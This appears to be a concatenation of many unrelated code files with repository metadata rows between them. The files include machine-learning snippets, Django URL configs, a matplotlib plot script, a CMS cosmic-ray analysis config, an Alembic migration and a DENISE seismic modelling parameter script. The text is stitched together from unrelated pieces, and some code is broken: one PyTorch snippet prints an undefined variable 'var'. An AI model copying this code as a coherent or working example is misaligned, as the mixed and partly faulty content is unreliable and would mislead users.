for images, labels in train_ds:
train_step(images, labels)
model.save_weights('saved_models', save_format='tf')
print('Epoch: ' + str(epoch + 1) + ' Loss: ' + str(train_loss.result()), ' Acc: ' + str(train_accuracy.result() * 100))
train_loss.reset_states()
train_accuracy.reset_states() | [
"[email protected]"
] | |
4e14132c8dedc644bde9ccf908cbbd5f2ed82839 | d8797e2aaf814a25282f036065e7f5cc4ccf5450 | /3. PyTorch/tutorial/gradient2.py | 7de9a983b513cc703cc4fda0e0816e03cacd8c60 | [] | no_license | ddubbu/AI-Study-with-python | 8b38c5f679795899238ccfbd7965ef26d3e0e695 | efc05c9977803fc1990e3dbec35541591d165155 | refs/heads/master | 2020-12-05T21:49:16.973179 | 2020-08-22T13:11:16 | 2020-08-22T13:11:16 | 232,256,387 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 102 | py | import torch
from torch.autograd import Variable
a = torch.rand(5)
print(a)
a = Variable(a)
print(var) | [
"[email protected]"
] | |
1f0b37159950fd92ee3d274aefba1b34e7bc80ce | 4703b990612ece92825eec4ad7608ce8fd563f4e | /src/server_handler/definitions.py | 052504276a4a1b3df71196ccde5f624fd125f36d | [
"MIT"
] | permissive | robertpardillo/Funnel | 69a270ee722f05e6a23eb27d7b3268f916a0d9f8 | f45e419f55e085bbb95e17c47b4c94a7c625ba9b | refs/heads/master | 2020-03-08T10:15:24.458019 | 2018-04-04T13:52:04 | 2018-04-04T13:52:04 | 128,068,139 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 115 | py |
import os
ROOT_DIR = os.path.abspath(os.path.dirname(__file__))
SERVER = 'handler'
IS_MULTITHREADING = 0
| [
"[email protected]"
] | |
fb3e3789a52522a4deefa049a55718abb44cd51a | 6aa9c8841ab3b86394dff1378106b4c9da57f772 | /scripts/plot_trips.py | 855638163a1c9028e1702d3f4becf51011ab686d | [] | no_license | dmulholl/taxisim | e185abbfa6dd4c15b10c5c34ee776b3f9911b391 | d5cc4a097fede2a2aab528a5cc649ee99d0e290e | refs/heads/master | 2021-03-05T20:46:13.953842 | 2020-08-05T22:47:43 | 2020-08-05T22:47:43 | 252,199,551 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 913 | py | #! /usr/bin/env python3
# ----------------------------------------------------------------------------------------
# This script plots a bar chart showing total daily trip numbers for February 2016
# (08:00 to 12:00).
# ----------------------------------------------------------------------------------------
import matplotlib.pyplot as plt
days = range(1, 30)
labels = [str(day) for day in days]
requests = [
60540, 67177, 70058, 70098, 66502, 53920, 44211, 64821, 68903, 71095, 76731,
73807, 58257, 52000, 58077, 69393, 68484, 70557, 68709, 52110, 46004, 62088,
73405, 78445, 68933, 72920, 57357, 44968, 64270,
]
fig, ax = plt.subplots(figsize=(10,5))
ax.bar(days, requests, width=0.9, tick_label=labels)
ax.set_xlabel("Day (February 2016)", fontweight='bold', labelpad=10)
ax.set_ylabel("Number of Trips", fontweight='bold', labelpad=10)
plt.tight_layout()
plt.show()
fig.savefig("image.eps")
| [
"[email protected]"
] | |
72390b880a83eaa83dcc10b3c8aa9ade7d362a74 | 043a17d196250048a5a34e990a19d8622436f9ce | /trainingday04/apple_pineapple/pikotaro.py | 7eca21f43e639d92300bf23bc479ac724ba2c319 | [] | no_license | chimtrangbu/hyperspace | 8df8cb9c5475b70b218d0a56034c7f520815fa0d | ec49324c705e9af61c3857cf2dea2a551bda5537 | refs/heads/master | 2020-03-26T07:18:34.249976 | 2018-12-20T05:16:55 | 2018-12-20T05:16:55 | 144,647,659 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 537 | py | # Creating a function for return lyrics of pineapple pen
def apple_pen(first_ingredient, second_ingredient):
des = ['I have a pen, I have a apple\nUh! Apple-Pen!']
des.append('I have a pen, I have a pineapple\nUh! Pineapple-Pen!')
des.append('I have a pen, I have a pen\nUh! Long pen!')
dic = [['pen', 'apple'], ['pen', 'pineapple'], ['pen', 'pen']]
inp = [first_ingredient, second_ingredient]
for i in range(3):
if dic[i] == inp:
return des[i]
raise ValueError('It is not in the lyrics')
| [
"[email protected]"
] | |
3b85f1cf324080852822ab4ad0d215c4ba3c2e10 | 666e6233275d23dda84a24fa55aa38243ec91536 | /src/toolshelf/commands/pull.py | cbd24b00f1060b32a525213163e46711a39faee9 | [
"MIT"
] | permissive | catseye/toolshelf | 5f4dbf8902ddbe4c3fcb2d240fc5b3a977ed2cb0 | d597455a57610d34658fa37a3ec8c780996cd65f | refs/heads/master | 2020-12-24T06:02:39.836314 | 2017-05-31T13:42:36 | 2017-05-31T13:42:36 | 4,310,103 | 6 | 2 | null | null | null | null | UTF-8 | Python | false | false | 497 | py | """
Pull latest revision of specified sources from each's upstream repository.
Upstream repo is always the external source from which
it was originally docked. Does not work on distfile-based sources.
pull {<docked-source-spec>}
"""
# TODO: figure out how to propogate was_changed to a subsequent 'build'
from toolshelf.toolshelf import BaseCommand
class Command(BaseCommand):
def show_progress(self):
return False
def perform(self, shelf, source):
source.update()
| [
"[email protected]"
] | |
4034376ae7eccd5f9a0ccefb3a5ca1d3a8526926 | 023fc76dfce8366062028d386bdb08407d2bec79 | /src/custom_extension_davidlopes.py | 40b4a8f9d715eb5cf7bd57990ae74b75346b77c8 | [] | no_license | dlopes7/accenture-training-plugins | 60fb0c6a83e73cc3f9039d704f7b02f66dedd1a5 | 931f0592c3a109452fe4069b8e9bd577511a9fa2 | refs/heads/master | 2022-10-08T15:41:47.103779 | 2020-06-05T19:33:53 | 2020-06-05T19:33:53 | 269,724,007 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,447 | py | import requests
import logging
from ruxit.api.base_plugin import RemoteBasePlugin
log = logging.getLogger(__name__)
class CustomExtensionDavidLopes(RemoteBasePlugin):
def query(self, **kwargs):
meu_nome = "David Lopes"
log.info("Extension executando!")
grupo = self.topology_builder.create_group(f"{meu_nome} - SpaceX", f"{meu_nome} - SpaceX")
navios = self.get_ships()
for navio in navios:
log.info(navio["ship_name"])
# Cria o custom device
id_navio = f'{meu_nome} {navio["ship_id"]}'
nome_navio = f'{meu_nome} {navio["ship_name"]}'
device = grupo.create_device(id_navio, nome_navio)
# Manda uma métrica absoluta (simples)
device.absolute("combustivel", navio["fuel"])
# Métrica com dimensões
for motor in navio["thrust"]:
device.absolute("potencia", motor["power"], dimensions={"Motor": motor["engine"]})
# Propriedades
device.report_property("Tipo", navio.get("ship_type", "Desconhecido"))
device.report_property("Porto", navio.get("home_port", "Desconhecido"))
# Topologia
device.add_endpoint(navio["ship_ip"])
# Statetimeseries
device.state_metric("clima", navio["weather"])
def get_ships(self):
return requests.get(f"{self.config['url']}/v3/ships").json()
| [
"[email protected]"
] | |
d0bdbe1317c6e8a5e655d4787ab7aea35fc7499d | 8469f426b47222d8f0c82c5f05131e61ea7bf623 | /uri1001/uri1012.py | 0df10d3a5b09693f89d938cdeb6e5bbf558eed07 | [] | no_license | jamil2gomes/uri-python | 493b07448fc9ddc9e86ae30808c0cd7465444281 | db3c9ae4dac93c4c03c040ee46a74a6c5987bc11 | refs/heads/master | 2020-08-23T07:18:13.146535 | 2019-10-26T01:59:46 | 2019-10-26T01:59:46 | 216,568,930 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | valor = input().split(" ")
a, b, c = valor
pi = 3.14159
triangulo = (float(a) * float(c)) / 2
circulo = pi * (pow(float(c), 2))
trapezio = float(c) * (float(a) + float(b)) / 2
quadrado = pow(float(b), 2)
retangulo = float(a) * float(b)
print("TRIANGULO: {:.3f}"
"\nCIRCULO: {:.3f}"
"\nTRAPEZIO: {:.3f}"
"\nQUADRADO: {:.3f}"
"\nRETANGULO: {:.3f}".format(triangulo, circulo, trapezio, quadrado, retangulo))
| [
"[email protected]"
] | |
a87fd4041d854f92d11a7ddf1b81ef9d504287d2 | bd5810c2eeafea74b6d0a3b1017297a69165e487 | /Python/list_pair_to_sum/PairToSumFunctions.py | 2f0c1a75aa30a77897cd46928e34815646b29c1f | [] | no_license | kpalmberg/Programming | e8d18ec3c0ee50ce72052be2a6170bf35df2b7d7 | c8dd5dad081e0682489af84e41c26d823eee0418 | refs/heads/master | 2020-04-05T20:01:40.614465 | 2018-11-29T10:17:12 | 2018-11-29T10:17:12 | 157,161,312 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,145 | py | class PairFunctions:
# Function to determine is a pair exists in the SORTED list which adds to the sum
# Linear time: O(n)
@staticmethod
def pairExistsWithSum_SortedList(sortedList, sum):
low = 0
high = len(sortedList) - 1
while low < high:
currentPairSum = sortedList[low] + sortedList[high]
if currentPairSum == sum:
return True
elif currentPairSum < sum:
low += 1
elif currentPairSum > sum:
high -= 1
return False
# Function to determine is a pair exists in the unsorted/sorted list which adds to the sum
# This method is cleaner code & can deal with an unsorted list as opposed to SortedList method
# Linear time: O(n)
@staticmethod
def pairExistsWithSum_unsortedOrSortedList(L1, sum):
compliment = []
for item in L1:
if item in compliment:
return True
compliment.append(sum - item)
return False
# Returns the index of the first pair in a list that adds to the sum, instead of returning a bool
# Runs in Linear time O(n)
@staticmethod
def getIndexesOfSumPair(nums, sum):
dict = {} # Hold compliments and their indexes
for index, num in enumerate(nums):
if sum - num in dict: # If the compliment for our current num exists in the dictionary
# Return the value of the compliment in our dictionary (its index), & our current index
return [dict[sum - num], index]
dict[num] = index # Add each number at its index to our dictionary
# Returns bool if pairs exists or not. Utilizes dictionary instead of list, & enumeration
# Runs in Linear time O(n)
@staticmethod
def getPairEqualSumResult(nums, sum):
dict = {} # Hold compliments and their indexes
for index, num in enumerate(nums):
if sum - num in dict: # If the compliment for our current num exists in the dictionary
return True # return True
dict[num] = index # Add each number at its index to our dictionary
return False
# Returns tuple. Tuple includes bool if pair exists with sum, AND the indexes of where the pair exists
# We could just call our getPairEqualsSumResult & getIndexesOfSumPair functions, but that would require
# more work to be done for the result. Runs in Linear time O(n)
@staticmethod
def getCompletePairEqualSumResults(nums, sum):
dict = {} # Hold compliments and their indexes
for index, num in enumerate(nums):
if sum - num in dict: # If the compliment for our current num exists in the dictionary
return True, [dict[sum - num], index]
dict[num] = index # Add each number at its index to our dictionary
return False
if __name__ == '__main__':
L0 = [1, 4, 6, 2, 8] # true expectation
sum = 12
test = PairFunctions.getCompletePairEqualSumResults(L0, sum)
print(test)
print("Entering list L0")
#print(pairExistsWithSum_SortedList(L0, sum), "\n")
| [
"[email protected]"
] | |
4d06f0fef0a49eaa87c617682a91228e07778e96 | a812e3953ff8da2e1f0eaecb69e09628366ca4ed | /session18/wordcount/urls.py | a61fbead0635aa95f1e10516733163f7bb4bce30 | [] | no_license | marobew/project | 999c45d0b2c7d1f1f1446d000673bef5924f0a65 | f20580a542acb4b64aea035f0fe812dcaca68437 | refs/heads/master | 2020-06-19T22:26:09.581459 | 2019-07-16T14:41:44 | 2019-07-16T14:41:44 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 164 | py | from django.urls import path
from . import views
urlpatterns = [
path('count/', views.count, name='count'),
path('result/', views.result, name='result'),
] | [
"[email protected]"
] | |
91d50cf45a97dacfbb3c939c17de07a29a3a08ad | 16ea89da61e52d75239286851b7b2fa98c3024a3 | /CosmicAnalysis/test/runCosmicAnalysis.py | 0d50e9cfcd35b815280922045d7b2f74eaa65a5c | [] | no_license | watson-ij/CosmicAnalysis | 67492bf1bb3318429a604c5588fee9bafdbb0900 | a3b2887523930a1da781fa73f575b37785b2b174 | refs/heads/master | 2023-06-09T03:05:44.908091 | 2021-07-02T05:33:23 | 2021-07-02T05:33:23 | 381,917,861 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,888 | py | import FWCore.ParameterSet.Config as cms
from Configuration.StandardSequences.Eras import eras
process = cms.Process('CosmicAnalysis',eras.Run3)
process.load("FWCore.MessageService.MessageLogger_cfi")
process.load('Configuration.StandardSequences.GeometryRecoDB_cff')
process.load('Configuration.StandardSequences.MagneticField_AutoFromDBCurrent_cff')
process.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')
process.load('RecoMuon.TrackingTools.MuonServiceProxy_cff')
process.load('TrackingTools.TransientTrack.TransientTrackBuilder_cfi')
from Configuration.AlCa.GlobalTag import GlobalTag
process.GlobalTag = GlobalTag(process.GlobalTag, '113X_dataRun3_Prompt_v2', '')
process.MessageLogger.cerr.FwkReport.reportEvery = 5000
process.maxEvents = cms.untracked.PSet(
input = cms.untracked.int32(-1)
)
#process.maxEvents.input = cms.untracked.int32(10)
# Input source
process.source = cms.Source("PoolSource", fileNames = cms.untracked.vstring())
process.source.skipEvents = cms.untracked.uint32(0)
from glob import glob
process.source.fileNames.extend(
# ['/store/express/Commissioning2021/ExpressCosmics/FEVT/Express-v1/000/342/218/00000/007c63b2-8625-44ed-b1e6-a13ee77f2a42.root'],
[f.replace('/eos/cms','') for f in glob('/eos/cms/store/express/Commissioning2021/ExpressCosmics/FEVT/Express-v1/000/342/218/00000/*')]
# [('file:'+f) for f in glob('/eos/cms/store/express/Commissioning2021/ExpressCosmics/FEVT/Express-v1/000/342/218/00000/*')][:5]
)
process.options = cms.untracked.PSet()
process.TFileService = cms.Service("TFileService",fileName = cms.string("cosmics.root"))
process.CosmicAnalysis = cms.EDAnalyzer('CosmicAnalysis',
process.MuonServiceProxy,
gemRecHits = cms.InputTag("gemRecHits"),
cscSegments = cms.InputTag("cscSegments"),
muons = cms.InputTag("muons"),
)
process.p = cms.Path(process.CosmicAnalysis)
| [
"[email protected]"
] | |
a0af7a358d5cf743246b22a5c21c9a74cf6da2de | e4920699d195c1a831d90e9f5470df71648943bf | /lists/urls.py | 671dc88708da597a71c7e5c24a595589fda3ae54 | [] | no_license | kuchichan/test_goat | b27ff4b8b94fb3b95c1d26e52337d4cbd1475dcf | 603d2f09d4368fb6893541a81daa23b09f621e64 | refs/heads/master | 2021-07-11T12:45:02.067314 | 2020-09-19T22:12:53 | 2020-09-19T22:12:53 | 204,347,922 | 0 | 1 | null | 2019-11-17T13:12:18 | 2019-08-25T20:46:09 | Python | UTF-8 | Python | false | false | 1,039 | py | """superlists URL Configuration
The `urlpatterns` list routes URLs to views. For more information please see:
https://docs.djangoproject.com/en/1.11/topics/http/urls/
Examples:
Function views
1. Add an import: from my_app import views
2. Add a URL to urlpatterns: url(r'^$', views.home, name='home')
Class-based views
1. Add an import: from other_app.views import Home
2. Add a URL to urlpatterns: url(r'^$', Home.as_view(), name='home')
Including another URLconf
1. Import the include() function: from django.conf.urls import url, include
2. Add a URL to urlpatterns: url(r'^blog/', include('blog.urls'))
"""
from django.conf.urls import url
from lists import views
urlpatterns = [
url(r'^new$', views.NewListView.as_view(), name='new_list'),
url(r'^(?P<pk>\d+)/$', views.ViewAndAddToList.as_view(),
name='view_list'),
url(r'^(?P<pk>\d+)/share/$', views.ShareListView.as_view(), name='share_list'),
url(r'^users/(?P<email>.+)/$', views.MyListsView.as_view(), name='my_lists'),
]
| [
"[email protected]"
] | |
01945a6a9fe9671dde25ee92c1525856eac4cfcc | 12f6466ba8fad1293e78ee123ad56938bd515a16 | /and_or.py | 61febdeeaae77f6e04f213087888888a5d958498 | [] | no_license | greshem/develop_python | 9dd1eaac4137b0c5b5b9f822bba07a8d6fa0f9ae | ddd370a35c63a89c5885f0918e3fe1d44c2a3069 | refs/heads/master | 2021-01-19T01:53:09.502670 | 2017-10-08T12:14:33 | 2017-10-08T12:14:33 | 45,077,612 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 184 | py | import os
import re
if not os.path.exists("test4.py") and not 0:
print "There is no gtest.zip"
def check_env():
if 1==find_bake and 1==find_vc2003:
return 1
else:
return 0
| [
"[email protected]"
] | |
c9377460124a516d9b3e84d11eb0cd06931ea316 | 0fd5793e78e39adbfe9dcd733ef5e42390b8cc9a | /python3/06_Collections/04_Dictionaries/m_dict_deepcopy.py | f87a64bcfe2a9745cf195aea1c8c7a956c93a781 | [] | no_license | udhayprakash/PythonMaterial | 3ea282ceb4492d94d401e3bc8bad9bf6e9cfa156 | e72f44e147141ebc9bf9ec126b70a5fcdbfbd076 | refs/heads/develop | 2023-07-08T21:07:33.154577 | 2023-07-03T10:53:25 | 2023-07-03T10:53:25 | 73,196,374 | 8 | 5 | null | 2023-05-26T09:59:17 | 2016-11-08T14:55:51 | Jupyter Notebook | UTF-8 | Python | false | false | 742 | py | import copy
from pprint import pp
payload = {
"DOB": "-",
"age": 25,
"education": {"college": "Yale", "highschool": "N/A"},
"hobbies": ["running", "coding", "-"],
"name": {"first": "Robert", "last": "Smith", "middle": ""},
}
pp(payload)
payload1 = copy.deepcopy(payload)
for key, value in payload.items():
if isinstance(value, (str, int, float)):
if value in ("N/A", "-", ""):
del payload1[key]
elif isinstance(value, list):
payload1[key] = [s_val for s_val in value if not (value in ("N/A", "-", ""))]
elif isinstance(value, dict):
for skey, sval in value.items():
if sval in ("N/A", "-", ""):
del payload1[key][skey]
print()
pp(payload1)
| [
"[email protected]"
] | |
dafd4069662cee4fb9446b0d89b3fa38abdc8f5d | 1cc638da0163ca7c8578b659fc0b067cc5d25265 | /server/migrations/versions/e160191ff485_.py | 8740099a7a050a53d9abd8c8b681bb46f187453a | [] | no_license | netang/label-it | a2591d456c8ed5c539bb2f0bf93caf2c3ef94d0c | 1e9ac5d1040b0c49af7c1838e43a010c45378d13 | refs/heads/master | 2023-01-13T01:02:56.943956 | 2020-01-25T15:45:05 | 2020-01-25T16:08:13 | 212,176,509 | 0 | 0 | null | 2023-01-04T22:12:51 | 2019-10-01T18:59:44 | Python | UTF-8 | Python | false | false | 711 | py | """empty message
Revision ID: e160191ff485
Revises:
Create Date: 2019-10-05 18:20:06.893067
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = 'e160191ff485'
down_revision = None
branch_labels = None
depends_on = None
def upgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.create_table('tasks',
sa.Column('id', sa.Integer(), nullable=False),
sa.Column('name', sa.String(), nullable=True),
sa.PrimaryKeyConstraint('id')
)
# ### end Alembic commands ###
def downgrade():
# ### commands auto generated by Alembic - please adjust! ###
op.drop_table('tasks')
# ### end Alembic commands ###
| [
"[email protected]"
] | |
51a0ebcdec898e707954df31f6137beb9cc47715 | e374785dd48ab3d3d8306c10b788983c2f2ac2e3 | /search_old/urls.py | 3dab893ca9935dc903b1902f04f567488d897a19 | [
"MIT"
] | permissive | common1/newassetcms | 0fd5ca2b310ccbd1f2ae432490b91ff22d352e2e | 65eee3c2ed9dac4cc56bfff863a6cbaff9830d26 | refs/heads/master | 2022-12-15T22:17:45.613715 | 2019-07-25T05:54:46 | 2019-07-25T05:54:46 | 186,583,756 | 0 | 0 | MIT | 2022-12-08T05:06:46 | 2019-05-14T08:54:19 | Python | UTF-8 | Python | false | false | 201 | py | from django.conf.urls import url
from django.urls import path
from .views import (
SearchAssetView,
)
app_name = 'search'
urlpatterns = [
path('', SearchAssetView.as_view(), name='query'),
]
| [
"[email protected]"
] | |
2f5d8559d038f71c467a9850b0d3b57bb4ada4c4 | 5d6140bde09548c43965c11ad1ab50237671e1f8 | /Denise/par_example.py | 6351adafbb5be520bdb508c3f5f4bccc88c6f929 | [] | no_license | wyzhang120/GeophyPkgTools | fb27e44c0a550b5b83ab9bfd59b39d4e0a108c2d | b8233798573ddeb72ae0d81897ca64955818d3c5 | refs/heads/master | 2022-06-09T01:25:20.638459 | 2020-05-06T05:49:42 | 2020-05-06T05:49:42 | 223,804,561 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 9,547 | py | import os
import numpy as np
import PkgTools.Denise.denise_out as deniseIO
from PkgTools.Denise.utils_denise import AcqCw2, print_factors, write_mfile
from PkgTools.TOY2DAC_marm.utils_marmousi_cw import crop_mamousi
from utils_model_building.util_model_building import mod2d
from sympy.ntheory import factorint
basedir = '/project/stewart/wzhang/src/DENISE-Black-Edition/par_fdtest'
fmodel = 'CW_fdtest'
fdenise_input = '{:s}.inp'.format(fmodel)
fsrc = '{:s}_src.txt'.format(fmodel)
frec = '{:s}_rec'.format(fmodel)
fd_order = 8
# Mamousi
segydir = '/project/stewart/wzhang/TOY2DAC/crosswell_toy2dac/FWI/Mamousi/model_full'
fvp = 'MODEL_P-WAVE_VELOCITY_1.25m.segy' # unit = m/s
fvs = 'MODEL_S-WAVE_VELOCITY_1.25m.segy'
frho = 'MODEL_DENSITY_1.25m.segy' # unit = g/cc
dxSgy = 1.25
npml = 20
dpml = npml * dxSgy
x0 = 9100 - dpml
x1 = 9600 + dpml - dxSgy
z0 = 1600 - dpml
z1 = 2600 + dpml - dxSgy
fc = 80 # fmax = 2.76 * fc
srctype = 1 # 1=explosive, 2=point force in x, 3=point force in z, 4=custom directive force
acqOffset = 25 + dpml # unit = m, dx = 1.25
acqDz = 100
tmax = 2.
vp = crop_mamousi(segydir, fvp, x0, x1, z0, z1)
vs = crop_mamousi(segydir, fvs, x0, x1, z0, z1)
rho = crop_mamousi(segydir, frho, x0, x1, z0, z1) * 1000
srcpar = {'x0': acqOffset, 'zmin': acqOffset, 'zmax': z1 - z0 - acqOffset, 'dz': acqDz,
'fname': os.path.join('source', fsrc), 'fc': fc, 'srctype': srctype, 'amp': 1.}
recpar = {'x0': x1 - x0 - acqOffset, 'zmin': acqOffset, 'zmax': z1 - z0 - acqOffset, 'dz': acqDz,
'fname': os.path.join('receiver', frec)}
acqObj = AcqCw2(srcpar, recpar)
mod2dDict0 = {'vp': vp, 'rho': rho}
acqDict0 = acqObj.acqdict
modObj = mod2d(mod2dDict0, acqDict0, dxSgy, dxSgy)
modObj.fdParams(fc, tmax, '{:d}'.format(fd_order))
para={
'filename': os.path.join(basedir, 'CW_fdtest.inp'),
'descr': fmodel,
'MODE': 0, # forward_modelling_only=0;FWI=1;RTM=2
'PHYSICS': 2, # 2D-PSV=1;2D-AC=2;2D-VTI=3;2D-TTI=4;2D-SH=5
# domain decomposition and 2D grid
'NPROCX': 4, 'NPROCY': 7, 'NX': 100, 'NY': 100, 'DH': 1,
# time stepping
'TIME': tmax, 'DT': 1e-3,
# FD params
'FD_ORDER': 8,
'max_relative_error': 0, # Taylor (max_relative_error=0) and Holberg (max_relative_error=1-4)
# source
'QUELLART': 1, # ricker=1 (delayed 1.5 / fc);fumue=2;from_SOURCE_FILE=3;SIN**3=4;Gaussian_deriv=5;Spike=6;Klauder=7
'SOURCE_FILE': os.path.join('./source', fsrc),
'SIGNAL_FILE': './wavelet/wavelet_cw',
'TS': 8, # duration_of_Klauder_wavelet_(in_seconds)
'SRCTYPE': srctype, # 1=explosive, 2=point force in x, 3=point force in z, 4=custom directive force
'RUN_MULTIPLE_SHOTS': 1, # multiple shots one by one
'FC_SPIKE_1': -5, # corner_frequency_of_highpass_filtered_spike
'FC_SPIKE_2': 15, # orner_frequency_of_lowpass_filtered_spike
'ORDER_SPIKE': 5, # order_of_Butterworth_filter
'WRITE_STF': 0, # write_source_wavelet
# model
'READMOD': 1, # read_model_parameters_from_MFILE(yes=1)
'MFILE': os.path.join('./model', fmodel),
'WRITEMOD': 0,
# boundary conditions
'FREE_SURF': 0,
'FW': npml, # width_of_absorbing_frame_(in_gridpoints)
'DAMPING': 3000, # Damping_velocity_in_CPML_(in_m/s)
'FPML': fc, # Frequency_within_the_PML_(Hz)
'npower': 2.0, 'k_max_PML': 1.0,
# Q approximation
'L': 0, # Number_of_relaxation_mechanisms
'FL': 20000, # L_Relaxation_frequencies
# snapshots
'SNAP': 1, # output_of_snapshots_(SNAP)(yes>0)
'SNAP_SHOT': 1, # write_snapshots_for_shot_no_(SNAP_SHOT)
'TSNAP1': 0.05, # first_snapshot_(in_sec)
'TSNAP2': 1, # last_snapshot_(in_sec)
'TSNAPINC': 0.05, # increment_(in_sec)
'IDX': 1, # increment_x-direction
'IDY': 1, # increment_y-direction
'SNAP_FORMAT': 3, # data-format 2=ASCII, 3=BINARY
'SNAP_FILE': './snap/{:s}_waveform_forward'.format(fmodel), # basic_filename
# receiver input
'READREC': 1, # read_receiver_positions_from_file, 1=single_file, 2=multiple_files
'REC_FILE': os.path.join('./receiver', frec),
# towed streamer
'N_STREAMER': 0, # The_first_(N_STREAMER)_receivers_in_REC_FILE_belong_to_streamer
'REC_INCR_X': 80, 'REC_INCR_Y': 0, # Cable_increment_per_shot
# seismogram
'SEISMO': 2, # output_of_seismograms, 0: no seismograms; 1: particle-velocities;
# 2: pressure (hydrophones); 3: curl and div; 4: everything
'NDT': 1, # samplingrate_(in_timesteps!)
'SEIS_FORMAT': 1, # SU(1);ASCII(2);BINARY(3)
'SEIS_FILE_VX': os.path.join('./seismo', '{:s}_vx'.format(fmodel)), # filename_for_Vx
'SEIS_FILE_VY': os.path.join('./seismo', '{:s}_vy'.format(fmodel)), # filename_for_Vy
'SEIS_FILE_CURL': os.path.join('./seismo', '{:s}_curl'.format(fmodel)), # filename_for_curl
'SEIS_FILE_DIV': os.path.join('./seismo', '{:s}_div'.format(fmodel)), # filename_for_div
'SEIS_FILE_P': os.path.join('./seismo', '{:s}_p'.format(fmodel)), # ilename_for_pressure
# log file
'LOG_FILE': os.path.join('./log', fmodel), # log-file_for_information_about_progress_of_program
'LOG': 2, # 0=no log; 1=PE 0 writes this info to stdout; 2=PE 0 also outputs information to LOG_FILE.0
# FWI
'ITERMAX': 100, # number_of_TDFWI_iterations
'JACOBIAN': 'jacobian/jacobian_test', # output_of_gradient
'DATA_DIR': 'su/MARMOUSI_spike/DENISE_MARMOUSI', # seismograms_of_measured_data
'TAPER': 0, # cosine_taper_(yes=1/no=0)
'TAPERLENGTH': 4, # taper_length_(in_rec_numbers)
'GRADT1': 21, 'GRADT2': 25, 'GRADT3': 490, 'GRADT4': 500, # gradient_taper_geometry
'INVMAT1': 1, # type_of_material_parameters_to_invert_(Vp,Vs,rho=1; Zp,Zs,rho=2; lam,mu,rho=3)
'QUELLTYPB': 1, # adjoint_source_type_(x-y_components=1, y_comp=2,
# x_comp=3, p_comp=4, x-p_comp=5, y-p_comp=6, x-y-p_comp=7)
'TESTSHOT_START': 25, 'TESTSHOT_END': 75, 'TESTSHOT_INCR': 10,# testshots_for_step_length_estimation
# gradient taper geometry
'SWS_TAPER_GRAD_VERT': 0, # apply_vertical_taper_(yes=1)
'SWS_TAPER_GRAD_HOR': 0, # apply_horizontal_taper
'EXP_TAPER_GRAD_HOR': 2.0, # exponent_of_depth_scaling_for_preconditioning
'SWS_TAPER_GRAD_SOURCES': 0, # apply_cylindrical_taper_(yes=1)
'SWS_TAPER_CIRCULAR_PER_SHOT': 0, # apply_cylindrical_taper_per_shot
'SRTSHAPE': 1, # damping shape (1=error_function,2=log_function)
'SRTRADIUS': 5., # radius_in_m, minimum for SRTRADIUS is 5x5 gridpoints
'FILTSIZE': 1, # filtsize_in_gridpoints
'SWS_TAPER_FILE': 0, # read_taper_from_file_(yes=1)
# output of ivnerted models
'INV_MOD_OUT': 1, # write_inverted_model_after_each_iteration_(yes=1)
'INV_MODELFILE':'model/modelTest', # output_of_models
# upper and lower limits of model params
'VPLOWERLIM': 3000, 'VPUPPERLIM': 4500, # lower/upper_limit_for_vp/lambda
'VSLOWERLIM': 1500, 'VSUPPERLIM': 2250, # lower/upper_limit_for_vs/mu
'RHOLOWERLIM': 2000, 'RHOUPPERLIM': 2600, # lower/upper_limit_for_rho
'QSLOWERLIM': 10, 'QSUPPERLIM': 100, # ower/upper_limit_for_Qs
# optimization method
'GRAD_METHOD': 2, # gradient_method_(PCG=1/LBFGS=2)
'PCG_BETA': 2, # preconditioned conjugate gradeint
# Fletcher_Reeves=1, Polak_Ribiere=2, Hestenes_Stiefel=3, Dai_Yuan=4
'NLBFGS': 20, # save_(NLBFGS)_updates_during_LBFGS_optimization
# smoothing models
'MODEL_FILTER': 0, # apply_spatial_filtering_(1=yes)
'FILT_SIZE': 5, # filter_length_in_gridpoints
# Reduce size of inversion grid
'DTINV': 3, # use_only_every_DTINV_time_sample_for_gradient_calculation
# step length estimation
'EPS_SCALE': 0.01, # maximum_model_change_of_maximum_model_value
'STEPMAX': 6, # maximum_number_of_attemps_to_find_a_step_length
'SCALEFAC': 2.0,
# trace killing
'TRKILL': 0, # apply_trace_killing_(yes=1)
'TRKILL_FILE': './trace_kill/trace_kill.dat', #
# time damping
'PICKS_FILE': './picked_times/picks_', # files_with_picked_times
# FWI log
'MISFIT_LOG_FILE': 'LOG_TEST.dat', # log_file_for_misfit_evolution
'MIN_ITER': 0, # minimum number of iteration per frequency
# Definition of smoothing the Jacobians with 2D-Gaussian
'GRAD_FILTER': 0, # apply_spatial_filtering_(yes=1)
'FILT_SIZE_GRAD': 10, # filter_length_in_gridpoints
# FWT double-difference time-lapse mode
'TIMELAPSE': 0, # activate_time_lapse_mode_(yes=1); if TIMELAPSE == 1,
# DATA_DIR should be the directory containing the data differences
'DATA_DIR_T0': 'su/CAES_spike_time_0/DENISE_CAES', # seismograms_of_synthetic_data_at_t0_()
# RTM
'RTMOD': 0, # apply_reverse_time_modelling_(yes=1)
'RTM_SHOT': 0, # output_of_RTM_result_for_each_shot_(yes=1)
# gravity modeling/inversion
'GRAVITY': 0, # 0 = no gravity modeling, 1 = active_gravity_modelling_, 2=inversion
}
para['DH'] = modObj.dx
para['DT'] = modObj.dt
para['TIME'] = modObj.dt * modObj.nt
nx, nz = modObj.vp.shape
vptest = np.ones((nx, nz), dtype=np.float32) * 3000
vstest = np.ones((nx, nz), dtype=np.float32) * 3000
rhotest = np.ones((nx, nz), dtype=np.float32) * 2000
deniseIO.calc_max_freq(vptest, vstest, para)
deniseIO.check_stability(vptest, vstest, para)
para['FW'] = int(dpml / para['DH'])
para['DAMPING'] = 3000
print_factors(nx, nz)
para['NPROCX'] = 4
para['NPROCY'] = 7
para['NX'] = nx
para['NY'] = nz
